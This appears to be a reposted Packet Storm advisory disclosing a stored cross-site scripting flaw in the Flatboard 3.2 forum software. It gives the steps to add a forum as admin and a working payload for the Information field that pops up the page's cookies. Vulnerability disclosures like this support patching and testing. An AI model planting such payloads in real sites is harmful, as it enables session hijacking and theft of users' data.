Flatboard 3.2 Cross Site Scripting
2024-6-24 21:21:17 Author: packetstormsecurity.com(查看原文) 阅读量:9 收藏

# Exploit Title: Flatboard v3.2  - Stored XSS
# Date: 2024-06-23
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://flatboard.org/
# Version: 3.2

----------------------------------------------------------------------------------------------------

1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum
2-Click Add Forum and write in Information field your payload : "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>
3-Save it , you will be see alert button


文章来源: https://packetstormsecurity.com/files/179196/flatboard32-xss.txt
如有侵权请联系:admin#unsafe.sh